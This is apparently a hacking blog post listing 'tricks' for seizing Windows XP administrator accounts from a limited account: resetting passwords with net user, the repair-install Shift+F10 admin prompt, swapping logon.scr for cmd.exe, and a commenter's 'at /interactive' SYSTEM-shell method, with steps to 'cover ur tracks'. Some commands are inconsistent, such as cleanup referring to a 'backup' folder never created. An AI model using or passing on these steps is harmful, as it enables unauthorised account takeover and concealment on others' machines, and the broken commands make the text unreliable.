HOW TO KNOW THE PASSWORD OF AN OTHER ADMIN??
1-start->run->cmd
2-write
Code:
net user administrator /random
TRICK 2
HOW TO MANAGE ALL ACCOUNTS EVEN ADMIN ONES FROM LIMITED USERS???
1-put XP cd in the CD drive...
2-restart the computer...
3-a "Press any key to boot" message will appear quickly press any key
4-an "inspectin your system and loading files" message appear then comes a "Welcome to setup" screen press Enter...
5-Licensing Agreement comes next ...press F8
6-then choose repair option,by pressing R on your xp OS, and let it load and copy files
7-now after 100% complete u will c “Your computer will reboot in 15 seconds”....let it reboot..
NOTE: after reboot DO NOT press any key when it asks "Press any key to boot" again
8-when a "Installing Devices" message appear under the progress bar... press Shift+F10....tht's a hole...just like the logon one.....a command prompt window will appear with a full admin power
9-type in there "NUSRMGR.CPL" and tht's it...now u can manage all accounts...like changing passwords.... delete passwords...
10-now pick the user u wont to change it's password....type "control userpasswords2" for a blank password ... meaning no password>>>>> password deleted
11-let the repair finish...
NOTE: this will NOT cause any loose of data..... only loose of password sure ,and will not affect ur installed programs.....
enjoy.....
TRICK 3
HOW TO CHANGE AN ADMIN PASSWORD FROM LIMITED ACCOUNTS??
1-go to start-->run then type "cmd" and press enter..
2-write the following code:
Code:
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
ren cmd.exe logon.scr
exit
3-wait for screen saver to show....then an unprotected command prompt will appear >>> meanning u have full power
write
Code:
net usernewpassword
4-after al done cover ur tracks by doing writing this code in command prompt
Code:
cd c:\windows\system32
ren logon.scr cmd.exe
copy backup\logon.scr .
del backup\*
rd backup
follow this to make it work if it is not..
Quote:
The LOGON.SCR trick does not work w/ current (all?) WXP installations on several fronts. 1) If you can replace logon.scr with cmd.exe, “Windows File Protection” (WFP) will undo it. So you’d have to be able to disable that first OR change the registry value for SCRNSAVE.EXE in [HKEY_USERS\S-1-5-18\Control Panel\Desktop] from logon.scr to cmd.exe 2) Assuming you get cmd.exe in as the screen saver for SYSTEM and wait the 10 +/- minutes, a CMD box will pop up as noted under the user SYSTEM. 3) You try to do a NET USER Administrator and you get “System error 5 has occurred. Access is denied” — how can this be? Isn’t SYSTEM all powerful? 4) SYSTEM is all powerful but Microsoft fixed this back door by removing almost all of SYSTEM’s privs. Running a “whoami /user /groups /priv” for a normal SYSTEM session (AT hh:mm /INTERACTIVE cmd) gives: [User] = “NT AUTHORITY\SYSTEM” [Group 1] = “BUILTIN\Administrators” [Group 2] = “Everyone” [Group 3] = “NT AUTHORITY\Authenticated Users” (X) SeTcbPrivilege = Act as part of the operating system (O) SeCreateTokenPrivilege = Create a token object (O) SeTakeOwnershipPrivilege = Take ownership of files or other objects (X) SeCreatePagefilePrivilege = Create a pagefile (X) SeLockMemoryPrivilege = Lock pages in memory (O) SeAssignPrimaryTokenPrivilege = Replace a process level token (O) SeIncreaseQuotaPrivilege = Adjust memory quotas for a process (X) SeIncreaseBasePriorityPrivilege = Increase scheduling priority (X) SeCreatePermanentPrivilege = Create permanent shared objects (X) SeDebugPrivilege = Debug programs (X) SeAuditPrivilege = Generate security audits (O) SeSecurityPrivilege = Manage auditing and security log (O) SeSystemEnvironmentPrivilege = Modify firmware environment values (X) SeChangeNotifyPrivilege = Bypass traverse checking (O) SeBackupPrivilege = Back up files and directories (O) SeRestorePrivilege = Restore files and directories (O) SeShutdownPrivilege = Shut down the system (X) SeLoadDriverPrivilege = Load and unload device drivers (X) SeProfileSingleProcessPrivilege = Profile single process (X) SeSystemtimePrivilege = Change the system time (X) SeUndockPrivilege = Remove computer from docking station (O) SeManageVolumePrivilege = Perform volume maintenance tasks (X) SeImpersonatePrivilege = Impersonate a client after authentication (X) SeCreateGlobalPrivilege = Create global objects But running the same command from the LOGON.SCR replacement instance of CMD.EXE gives: [User] = “NT AUTHORITY\SYSTEM” [Group 1] = “BUILTIN\Administrators” [Group 2] = “Everyone” [Group 3] = “NT AUTHORITY\Authenticated Users” (X) SeChangeNotifyPrivilege = Bypass traverse checking That’s why this doesn’t work. Rick Valstar Star Consulting r + last name + at + gmail + dot + com nx Says: 8 August 2007 at 11:14 pm. 1. press “start” 2. run cmd 3. run at HH:MM /interactive “cmd.exe” (time HH:MM+1M) 4. press CTRL+ALT+DEL and disable explorer.exe (end process) 5.in new black window run explorer After these commands starts SYSTEM account and make your new admin acount |
Aucun commentaire:
Enregistrer un commentaire